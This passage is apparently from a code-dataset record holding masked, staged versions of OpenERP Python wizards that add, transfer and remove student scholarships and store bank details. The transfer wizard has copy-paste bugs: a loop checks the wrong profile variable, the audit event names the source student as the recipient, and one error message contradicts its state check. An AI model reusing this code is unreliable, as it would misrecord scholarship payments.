context)\n if doc.state != 'bolsista':\n raise osv.except_osv(u'Discente bolsista',\n u'O discente já é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'O discente não pode ser classificado como bolsista')\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id_de'] = doc.disciplina_id.curso_id.id\n res['disciplina_id_de'] = doc.disciplina_id.id\n res['tutor_de'] = doc.tutor\n res['status_de'] = doc.state\n res['doc_discente_id_de'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, comp, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {('disciplina_id_' + comp): False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {('disciplina_id_' + comp): [('id', 'in', disc)]}}\n if not disc:\n res['value'] = {('disciplina_id_' + comp): False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, comp, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id and doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n return {'value': {('doc_discente_id_' + comp): doc_discente_id}}\n return {'value': {('doc_discente_id_' + comp): False}}\n\n def onchange_banco(self, cr, uid, ids, banco_id, context=None):\n if banco_id:\n banco = self.pool.get('ud.banco').read(cr, uid, banco_id, [\n 'agencia', 'dv_agencia', 'conta', 'dv_conta', 'operacao'],\n context=context, load='_classic_write')\n vals = {'agencia': False, 'dv_agencia': False, 'conta': False,\n 'dv_conta': False, 'operacao': False}\n vals.update({('%s_v' % dado): banco.get(dado) for dado in banco\n .keys()})\n return {'value': vals}\n return {'value': {'agencia_v': False, 'dv_agencia_v': False,\n 'conta_v': False, 'dv_conta_v': False, 'operacao_v': False,\n 'agencia': False, 'dv_agencia': False, 'conta': False,\n 'dv_conta': False, 'operacao': False}}\n\n def botao_transferir(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n for transf in self.browse(cr, uid, ids, context):\n matricula = transf.doc_discente_id_para.discente_id.matricula\n for perfil in transf.doc_discente_id_para.discente_id.pessoa_id.papel_ids:\n if perfil.matricula == matricula and perfil.tipo == 'a':\n if perfil.is_bolsista:\n raise osv.except_osv(u'Discente bolsista',\n u'O discente \"{}\" sob matrícula \"{}\" possui bolsa do tipo: \"{}\"'\n .format(transf.doc_discente_id_para.discente_id\n .pessoa_id.name, matricula, TIPOS_BOLSA[perfil.\n tipo_bolsa]))\n break\n if not perfil:\n raise osv.except_osv(u'Perfil excluído', \n u'O perfil do discente para a matrícula \"%s\" não existe ou foi excluído'\n % matricula or '')\n matricula = transf.doc_discente_id_de.discente_id.matricula\n for perfil_de in transf.doc_discente_id_de.discente_id.pessoa_id.papel_ids:\n if perfil.matricula == matricula and perfil.tipo == 'a':\n break\n responsavel = self.pool.get('ud.employee').search(cr,\n SUPERUSER_ID, [('user_id', '=', uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n valor = perfil_de.valor_bolsa\n perfil_model.write(cr, SUPERUSER_ID, perfil.id, {'is_bolsista':\n True, 'tipo_bolsa': 'm', 'valor_bolsa': valor})\n perfil_model.write(cr, SUPERUSER_ID, perfil_de.id, {\n 'is_bolsista': False, 'tipo_bolsa': False, 'valor_bolsa': \n False})\n transf.doc_discente_id_de.write({'state': 'n_bolsista'})\n transf.doc_discente_id_para.write({'state': 'bolsista',\n 'is_active': True})\n get_banco(self, cr, transf, transf.doc_discente_id_para.\n discente_id.pessoa_id.id, context)\n evento = {'responsavel_id': responsavel[0], 'name':\n u'Transferência de bolsa', 'envolvidos_ids': [(4, transf.\n doc_discente_id_de.discente_id.pessoa_id.id), (4, transf.\n doc_discente_id_para.discente_id.pessoa_id.id)],\n 'descricao': \n u'Transferência de bolsa no valor de R$ %(valor)s do discente %(discente_de)s sob matrícula %(matricula_de)s para o(a) discente \"%(discente_para)s\" sob matrícula\"%(matricula_para)s\".'\n % {'valor': valor, 'discente_de': transf.\n doc_discente_id_de.discente_id.pessoa_id.name.upper(),\n 'matricula_de': perfil_de.matricula, 'discente_para':\n transf.doc_discente_id_de.discente_id.pessoa_id.name.upper(\n ), 'matricula_para': perfil_de.matricula}}\n transf.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n\n\nclass RemoverBolsaWizard(osv.TransientModel):\n _name = 'ud.monitoria.bolsa.remover.wizard'\n _description = u'Remoção de bolsa de discente'\n _columns = {'semestre_id': fields.many2one('ud.monitoria.registro',\n u'Semestre', required=True, readonly=True), 'curso_id': fields.\n many2one('ud.curso', u'Curso', required=True, domain=\n \"[('is_active', '=', True)]\"), 'disciplina_id': fields.many2one(\n 'ud.monitoria.disciplina', u'Disciplinas', required=True, domain=\n \"[('id', '=', False)]\"), 'tutor': fields.boolean(u'Tutor?'),\n 'doc_discente_id': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('disciplina_id', '=', disciplina_id), ('tutor', '=', tutor), ('is_active', '=', True), ('state', '=', 'bolsista')]\"\n )}\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(RemoverBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state != 'bolsista':\n raise osv.except_osv(u'Discente não bolsista',\n u'O discente não é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'Não é possível alterar o status de discentes inativos'\n )\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id'] = doc.disciplina_id.curso_id.id\n res['disciplina_id'] = doc.disciplina_id.id\n res['tutor'] = doc.tutor\n res['doc_discente_id'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {'disciplina_id': False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {'disciplina_id': [('id', 'in', disc)]}}\n if not disc:\n res['value'] = {'disciplina_id': False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id and doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n return {'value': {'doc_discente_id': doc_discente_id}}\n return {'value': {'doc_discente_id': False}}\n\n def botao_remover(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n pessoa_model = self.pool.get('ud.employee')\n for rem in self.browse(cr, uid, ids, context):\n responsavel = pessoa_model.search(cr, SUPERUSER_ID, [('user_id',\n '=', uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n perfil = rem.doc_discente_id.inscricao_id.perfil_id\n perfil_model.write(cr, SUPERUSER_ID, perfil.id, {'is_bolsista':\n False, 'tipo_bolsa': False, 'valor_bolsa': False})\n rem.doc_discente_id.write({'state': 'n_bolsista'})\n evento = {'responsavel_id': responsavel[0], 'name': \n u'Remoção de bolsa: \"%s\"' % rem.doc_discente_id.discente_id\n .name, 'envolvidos_ids': [(4, rem.doc_discente_id.\n discente_id.id)], 'descricao': \n u'A bolsa do discente \"%s\" sob matrícula \"%s\" foi removida.' %\n (rem.doc_discente_id.discente_id.name.upper(), perfil.\n matricula)}\n rem.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n",
"step-4": "<mask token>\nTIPOS_BOLSA = dict(_TIPOS_BOLSA)\n\n\ndef get_banco(cls, cr, browse_record, usuario_id, context=None):\n dados_bancarios_model = cls.pool.get('ud.dados.bancarios')\n args = [('banco_id', '=', browse_record.banco_id.id)]\n if browse_record.agencia_v:\n args.append(('agencia', '=', browse_record.agencia))\n if browse_record.dv_agencia_v:\n args.append(('dv_agencia', '=', browse_record.dv_agencia))\n if browse_record.conta_v:\n args.append(('conta', '=', browse_record.conta))\n if browse_record.dv_conta_v:\n args.append(('dv_conta', '=', browse_record.dv_conta))\n if browse_record.operacao_v:\n args.append(('operacao', '=', browse_record.operacao))\n dados_bancarios = dados_bancarios_model.search(cr, SUPERUSER_ID, args,\n context=context)\n if dados_bancarios:\n dados_bancarios = dados_bancarios_model.browse(cr, SUPERUSER_ID,\n dados_bancarios[0])\n if not dados_bancarios.ud_conta_id:\n return dados_bancarios.id\n elif dados_bancarios.ud_conta_id.id == usuario_id:\n return dados_bancarios.id\n raise osv.except_osv(u'Dados Bancários duplicados',\n u'Outra pessoa já possui esses dados bancários!')\n dados = {'banco_id': browse_record.banco_id.id, 'agencia':\n browse_record.agencia, 'dv_agencia': browse_record.dv_agencia,\n 'conta': browse_record.conta, 'dv_conta': browse_record.dv_conta,\n 'operacao': browse_record.operacao, 'ud_conta_id': usuario_id}\n return dados_bancarios_model.create(cr, SUPERUSER_ID, dados, context=\n context)\n\n\nclass AdicionarBolsaWizard(osv.TransientModel):\n _name = 'ud.monitoria.bolsa.adicionar.wizard'\n _description = u'Inclusão de bolsa de monitoria para discente (UD)'\n _STATES = [('n_bolsista', u'Não Bolsista'), ('reserva',\n u'Cadastro de Reserva')]\n\n def _bolsas(self, cr, uid, ids, campos, args, context=None):\n oferta_model = self.pool.get('ud.monitoria.oferta.disciplina')\n res = {}\n for add in self.browse(cr, uid, ids, context):\n res[add.id] = add.disciplina_id.bolsas\n return res\n _columns = {'semestre_id': fields.many2one('ud.monitoria.registro',\n u'Semestre', required=True, readonly=True), 'curso_id': fields.\n many2one('ud.curso', u'Curso', required=True, domain=\n \"[('is_active', '=', True)]\"), 'disciplina_id': fields.many2one(\n 'ud.monitoria.disciplina', u'Disciplinas', required=True, domain=\n \"[('semestre_id', '=', semestre_id), ('curso_id', '=', curso_id), ('is_active', '=', True)]\"\n ), 'bolsas': fields.function(_bolsas, type='integer', string=\n u'Bolsas disponíveis', help=\n u'Número de bolsas disponíveis para a disciplina'), 'valor_bolsa':\n fields.float(u'Bolsa (R$)'), 'tutor': fields.boolean(u'Tutor?'),\n 'status': fields.selection(_STATES, u'Status', required=True),\n 'doc_discente_id': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('disciplina_id', '=', disciplina_id), ('tutor', '=', tutor), ('is_active', '=', True), ('state', '=', status)]\"\n ), 'dados_bancarios_id': fields.many2one('ud.dados.bancarios',\n u'Dados Bancários', domain=[('id', '=', False)]), 'banco_id':\n fields.many2one('ud.banco', u'Banco', ondelete='restrict'),\n 'agencia': fields.char(u'Agência', size=4, help=\n u'Número da Agência'), 'dv_agencia': fields.char(u'DV Agência',\n size=2, help=u'Dígito verificador da Agência'), 'conta': fields.\n char(u'Conta', size=10, help=u'Número da Conta'), 'dv_conta':\n fields.char(u'DV Conta', size=1, help=\n u'Dígito verificador da Conta'), 'operacao': fields.char(\n u'Operação', size=3, help=u'Tipo de conta'), 'agencia_v': fields.\n related('banco_id', 'agencia', type='boolean', invisible=True,\n readonly=True), 'dv_agencia_v': fields.related('banco_id',\n 'dv_agencia', type='boolean', invisible=True, readonly=True),\n 'conta_v': fields.related('banco_id', 'conta', type='boolean',\n invisible=True, readonly=True), 'dv_conta_v': fields.related(\n 'banco_id', 'dv_conta', type='boolean', invisible=True, readonly=\n True), 'operacao_v': fields.related('banco_id', 'operacao', type=\n 'boolean', invisible=True, readonly=True)}\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(AdicionarBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n res['status'] = 'n_bolsista'\n res['valor_bolsa'] = 400.0\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state == 'bolsista':\n raise osv.except_osv(u'Discente bolsista',\n u'O discente já é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'Não é possível alterar o status de discentes inativos'\n )\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id'] = doc.disciplina_id.curso_id.id\n res['disciplina_id'] = doc.disciplina_id.id\n res['tutor'] = doc.tutor\n res['status'] = doc.state\n res['doc_discente_id'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {'disciplina_id': False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {'disciplina_id': [('id', 'in', disc)]}}\n if not disc:\n res['value'] = {'disciplina_id': False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id:\n if doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n disciplina_id = self.pool.get('ud.monitoria.disciplina').browse(cr,\n uid, disciplina_id, context)\n return {'value': {'doc_discente_id': doc_discente_id, 'bolsas':\n disciplina_id.bolsas}}\n return {'value': {'doc_discente_id': False, 'bolsas': 0}}\n\n def onchange_doc_discente(self, cr, uid, ids, doc_discente_id,\n dados_bancarios_id, context=None):\n if doc_discente_id:\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(cr,\n uid, doc_discente_id, context)\n if not dados_bancarios_id:\n dados_bancarios_id = getattr(doc.dados_bancarios_id, 'id', \n False)\n return {'value': {'dados_bancarios_id': dados_bancarios_id},\n 'domain': {'dados_bancarios_id': [('ud_conta_id', '=', doc.\n discente_id.id)]}}\n return {'value': {'dados_bancarios_id': False}, 'domain': {\n 'dados_bancarios_id': [('id', '=', False)]}}\n\n def onchange_banco(self, cr, uid, ids, banco_id, context=None):\n if banco_id:\n banco = self.pool.get('ud.banco').read(cr, uid, banco_id, [\n 'agencia', 'dv_agencia', 'conta', 'dv_conta', 'operacao'],\n context=context, load='_classic_write')\n vals = {'agencia': False, 'dv_agencia': False, 'conta': False,\n 'dv_conta': False, 'operacao': False}\n vals.update({('%s_v' % dado): banco.get(dado) for dado in banco\n .keys()})\n return {'value': vals}\n return {'value': {'agencia_v': False, 'dv_agencia_v': False,\n 'conta_v': False, 'dv_conta_v': False, 'operacao_v': False,\n 'agencia': False, 'dv_agencia': False, 'conta': False,\n 'dv_conta': False, 'operacao': False}}\n\n def botao_adicionar(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n for add in self.browse(cr, uid, ids, context):\n if add.bolsas == 0:\n raise osv.except_osv(u'Bolsas Insuficientes',\n u'Não há bolsas disponíveis para essa disciplina')\n elif not add.doc_discente_id.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'O discente não pode ser classificado como bolsista')\n if add.doc_discente_id.inscricao_id.perfil_id.is_bolsista:\n raise osv.except_osv(u'Discente bolsista',\n u'O discente \"{}\" sob matrícula \"{}\" possui bolsa do tipo: \"{}\"'\n .format(add.doc_discente_id.discente_id.name, add.\n doc_discente_id.inscricao_id.perfil_id.matricula,\n TIPOS_BOLSA[add.doc_discente_id.inscricao_id.perfil_id.\n tipo_bolsa]))\n responsavel = self.pool.get('ud.employee').search(cr,\n SUPERUSER_ID, [('user_id', '=', uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado a uma pessoa no núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n perfil_model.write(cr, SUPERUSER_ID, add.doc_discente_id.\n inscricao_id.perfil_id.id, {'is_bolsista': True,\n 'tipo_bolsa': 'm', 'valor_bolsa': ('%.2f' % add.valor_bolsa\n ).replace('.', ',')})\n if not add.dados_bancarios_id:\n dados_bancarios = get_banco(self, cr, add, add.\n doc_discente_id.discente_id.id, context)\n else:\n dados_bancarios = add.dados_bancarios_id.id\n add.doc_discente_id.write({'state': 'bolsista',\n 'dados_bancarios_id': dados_bancarios})\n evento = {'responsavel_id': responsavel[0], 'name': \n u'Adição de bolsa: \"%s\"' % add.doc_discente_id.discente_id.\n name, 'envolvidos_ids': [(4, add.doc_discente_id.\n discente_id.id)], 'descricao': \n u'Uma bolsa de R$ %s foi vinculada para o(a) discente \"%s\" sob matrícula \"%s\".'\n % (('%.2f' % add.valor_bolsa).replace('.', ','), add.\n doc_discente_id.discente_id.name.upper(), add.\n doc_discente_id.inscricao_id.perfil_id.matricula)}\n add.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n\n\nclass TransferirBolsaWizard(osv.TransientModel):\n _name = 'ud.monitoria.bolsa.transferir.wizard'\n _description = u'Transferência de bolsa de monitoria (UD)'\n _STATES = [('n_bolsista', u'Não Bolsista'), ('reserva',\n u'Cadastro de Reserva')]\n _columns = {'semestre_id': fields.many2one('ud.monitoria.registro',\n u'Semestre', required=True, readonly=True), 'curso_id_de': fields.\n many2one('ud.curso', u'Curso', required=True, domain=\n \"[('is_active', '=', True)]\"), 'disciplina_id_de': fields.many2one(\n 'ud.monitoria.disciplina', u'Disciplinas', required=True, domain=\n \"[('id', '=', False)]\"), 'tutor_de': fields.boolean(u'Tutor?'),\n 'doc_discente_id_de': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('is_active', '=', True), ('state', '=', 'bolsista'), ('disciplina_id', '=', disciplina_id_de), ('tutor', '=', tutor_de)]\"\n ), 'curso_id_para': fields.many2one('ud.curso', u'Curso', required=\n True, domain=\"[('is_active', '=', True)]\"), 'disciplina_id_para':\n fields.many2one('ud.monitoria.disciplina', u'Disciplinas', required\n =True, domain=\n \"[('semestre_id', '=', semestre_id), ('curso_id', '=', curso_id_para), ('is_active', '=', True)]\"\n ), 'tutor_para': fields.boolean(u'Tutor?'), 'status_para': fields.\n selection(_STATES, u'Status', required=True),\n 'doc_discente_id_para': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('is_active', '=', True), ('state', '=', status_para), ('disciplina_id', '=', disciplina_id_para), ('tutor', '=', tutor_para)]\"\n ), 'banco_id': fields.many2one('ud.banco', u'Banco', ondelete=\n 'restrict'), 'agencia': fields.char(u'Agência', size=4, help=\n u'Número da Agência'), 'dv_agencia': fields.char(u'DV Agência',\n size=2, help=u'Dígito verificador da Agência'), 'conta': fields.\n char(u'Conta', size=10, help=u'Número da Conta'), 'dv_conta':\n fields.char(u'DV Conta', size=1, help=\n u'Dígito verificador da Conta'), 'operacao': fields.char(\n u'Operação', size=3, help=u'Tipo de conta'), 'agencia_v': fields.\n related('banco_id', 'agencia', type='boolean', invisible=True,\n readonly=True), 'dv_agencia_v': fields.related('banco_id',\n 'dv_agencia', type='boolean', invisible=True, readonly=True),\n 'conta_v': fields.related('banco_id', 'conta', type='boolean',\n invisible=True, readonly=True), 'dv_conta_v': fields.related(\n 'banco_id', 'dv_conta', type='boolean', invisible=True, readonly=\n True), 'operacao_v': fields.related('banco_id', 'operacao', type=\n 'boolean', invisible=True, readonly=True)}\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(TransferirBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state != 'bolsista':\n raise osv.except_osv(u'Discente bolsista',\n u'O discente já é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'O discente não pode ser classificado como bolsista')\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id_de'] = doc.disciplina_id.curso_id.id\n res['disciplina_id_de'] = doc.disciplina_id.id\n res['tutor_de'] = doc.tutor\n res['status_de'] = doc.state\n res['doc_discente_id_de'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, comp, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {('disciplina_id_' + comp): False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {('disciplina_id_' + comp): [('id', 'in', disc)]}}\n if not disc:\n res['value'] = {('disciplina_id_' + comp): False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, comp, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id and doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n return {'value': {('doc_discente_id_' + comp): doc_discente_id}}\n return {'value': {('doc_discente_id_' + comp): False}}\n\n def onchange_banco(self, cr, uid, ids, banco_id, context=None):\n if banco_id:\n banco = self.pool.get('ud.banco').read(cr, uid, banco_id, [\n 'agencia', 'dv_agencia', 'conta', 'dv_conta', 'operacao'],\n context=context, load='_classic_write')\n vals = {'agencia': False, 'dv_agencia': False, 'conta': False,\n 'dv_conta': False, 'operacao': False}\n vals.update({('%s_v' % dado): banco.get(dado) for dado in banco\n .keys()})\n return {'value': vals}\n return {'value': {'agencia_v': False, 'dv_agencia_v': False,\n 'conta_v': False, 'dv_conta_v': False, 'operacao_v': False,\n 'agencia': False, 'dv_agencia': False, 'conta': False,\n 'dv_conta': False, 'operacao': False}}\n\n def botao_transferir(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n for transf in self.browse(cr, uid, ids, context):\n matricula = transf.doc_discente_id_para.discente_id.matricula\n for perfil in transf.doc_discente_id_para.discente_id.pessoa_id.papel_ids:\n if perfil.matricula == matricula and perfil.tipo == 'a':\n if perfil.is_bolsista:\n raise osv.except_osv(u'Discente bolsista',\n u'O discente \"{}\" sob matrícula \"{}\" possui bolsa do tipo: \"{}\"'\n .format(transf.doc_discente_id_para.discente_id\n .pessoa_id.name, matricula, TIPOS_BOLSA[perfil.\n tipo_bolsa]))\n break\n if not perfil:\n raise osv.except_osv(u'Perfil excluído', \n u'O perfil do discente para a matrícula \"%s\" não existe ou foi excluído'\n % matricula or '')\n matricula = transf.doc_discente_id_de.discente_id.matricula\n for perfil_de in transf.doc_discente_id_de.discente_id.pessoa_id.papel_ids:\n if perfil.matricula == matricula and perfil.tipo == 'a':\n break\n responsavel = self.pool.get('ud.employee').search(cr,\n SUPERUSER_ID, [('user_id', '=', uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n valor = perfil_de.valor_bolsa\n perfil_model.write(cr, SUPERUSER_ID, perfil.id, {'is_bolsista':\n True, 'tipo_bolsa': 'm', 'valor_bolsa': valor})\n perfil_model.write(cr, SUPERUSER_ID, perfil_de.id, {\n 'is_bolsista': False, 'tipo_bolsa': False, 'valor_bolsa': \n False})\n transf.doc_discente_id_de.write({'state': 'n_bolsista'})\n transf.doc_discente_id_para.write({'state': 'bolsista',\n 'is_active': True})\n get_banco(self, cr, transf, transf.doc_discente_id_para.\n discente_id.pessoa_id.id, context)\n evento = {'responsavel_id': responsavel[0], 'name':\n u'Transferência de bolsa', 'envolvidos_ids': [(4, transf.\n doc_discente_id_de.discente_id.pessoa_id.id), (4, transf.\n doc_discente_id_para.discente_id.pessoa_id.id)],\n 'descricao': \n u'Transferência de bolsa no valor de R$ %(valor)s do discente %(discente_de)s sob matrícula %(matricula_de)s para o(a) discente \"%(discente_para)s\" sob matrícula\"%(matricula_para)s\".'\n % {'valor': valor, 'discente_de': transf.\n doc_discente_id_de.discente_id.pessoa_id.name.upper(),\n 'matricula_de': perfil_de.matricula, 'discente_para':\n transf.doc_discente_id_de.discente_id.pessoa_id.name.upper(\n ), 'matricula_para': perfil_de.matricula}}\n transf.semestre_id.write({'eventos_ids': [(0, 0, evento)]})\n return True\n\n\nclass RemoverBolsaWizard(osv.TransientModel):\n _name = 'ud.monitoria.bolsa.remover.wizard'\n _description = u'Remoção de bolsa de discente'\n _columns = {'semestre_id': fields.many2one('ud.monitoria.registro',\n u'Semestre', required=True, readonly=True), 'curso_id': fields.\n many2one('ud.curso', u'Curso', required=True, domain=\n \"[('is_active', '=', True)]\"), 'disciplina_id': fields.many2one(\n 'ud.monitoria.disciplina', u'Disciplinas', required=True, domain=\n \"[('id', '=', False)]\"), 'tutor': fields.boolean(u'Tutor?'),\n 'doc_discente_id': fields.many2one(\n 'ud.monitoria.documentos.discente', u'Discente', required=True,\n domain=\n \"[('disciplina_id', '=', disciplina_id), ('tutor', '=', tutor), ('is_active', '=', True), ('state', '=', 'bolsista')]\"\n )}\n\n def default_get(self, cr, uid, fields_list, context=None):\n res = super(RemoverBolsaWizard, self).default_get(cr, uid,\n fields_list, context)\n context = context or {}\n if context.get('active_id', False):\n if context.get('active_model', False) == 'ud.monitoria.registro':\n res['semestre_id'] = context.get('active_id')\n elif context.get('active_model', False\n ) == 'ud.monitoria.documentos.discente':\n doc = self.pool.get('ud.monitoria.documentos.discente').browse(\n cr, uid, context.get('active_id'), context)\n if doc.state != 'bolsista':\n raise osv.except_osv(u'Discente não bolsista',\n u'O discente não é bolsista')\n elif not doc.is_active:\n raise osv.except_osv(u'Documento do discente inativo',\n u'Não é possível alterar o status de discentes inativos'\n )\n res['semestre_id'] = doc.disciplina_id.semestre_id.id\n res['curso_id'] = doc.disciplina_id.curso_id.id\n res['disciplina_id'] = doc.disciplina_id.id\n res['tutor'] = doc.tutor\n res['doc_discente_id'] = doc.id\n return res\n\n def onchange_curso(self, cr, uid, ids, semestre_id, curso_id,\n disciplina_id, context=None):\n if not (semestre_id and curso_id):\n return {'value': {'disciplina_id': False}}\n reg = self.pool.get('ud.monitoria.registro').read(cr, uid,\n semestre_id, ['processos_seletivos_ids'], context=context, load\n ='_classic_write')\n args = [('curso_id', '=', curso_id), ('processo_seletivo_id', '=',\n reg['processos_seletivos_ids']), ('is_active', '=', True)]\n disc = self.pool.get('ud.monitoria.disciplina').search(cr, uid,\n args, context=context)\n res = {'domain': {'disciplina_id': [('id', 'in', disc)]}}\n if not disc:\n res['value'] = {'disciplina_id': False}\n return res\n\n def onchange_disciplina(self, cr, uid, ids, disciplina_id,\n doc_discente_id, context=None):\n if disciplina_id and doc_discente_id:\n doc_discente = self.pool.get('ud.monitoria.documentos.discente'\n ).browse(cr, uid, doc_discente_id, context)\n doc_discente_id = (doc_discente_id if doc_discente.\n disciplina_id.id == disciplina_id else False)\n return {'value': {'doc_discente_id': doc_discente_id}}\n return {'value': {'doc_discente_id': False}}\n\n def botao_remover(self, cr, uid, ids, context=None):\n perfil_model = self.pool.get('ud.perfil')\n pessoa_model = self.pool.get('ud.employee')\n for rem in self.browse(cr, uid, ids, context):\n responsavel = pessoa_model.search(cr, SUPERUSER_ID, [('user_id',\n '=', uid)], limit=2)\n if not responsavel:\n raise osv.except_osv(u'Registro Inexistente',\n u'Não é possível realizar essa alteração enquanto seu login não estiver vinculado ao núcleo'\n )\n if len(responsavel) > 1:\n raise osv.except_osv(u'Multiplos vínculos',\n u'Não é possível realizar essa alteração enquanto seu login possuir multiplos vínculos no núcleo'\n )\n perfil = 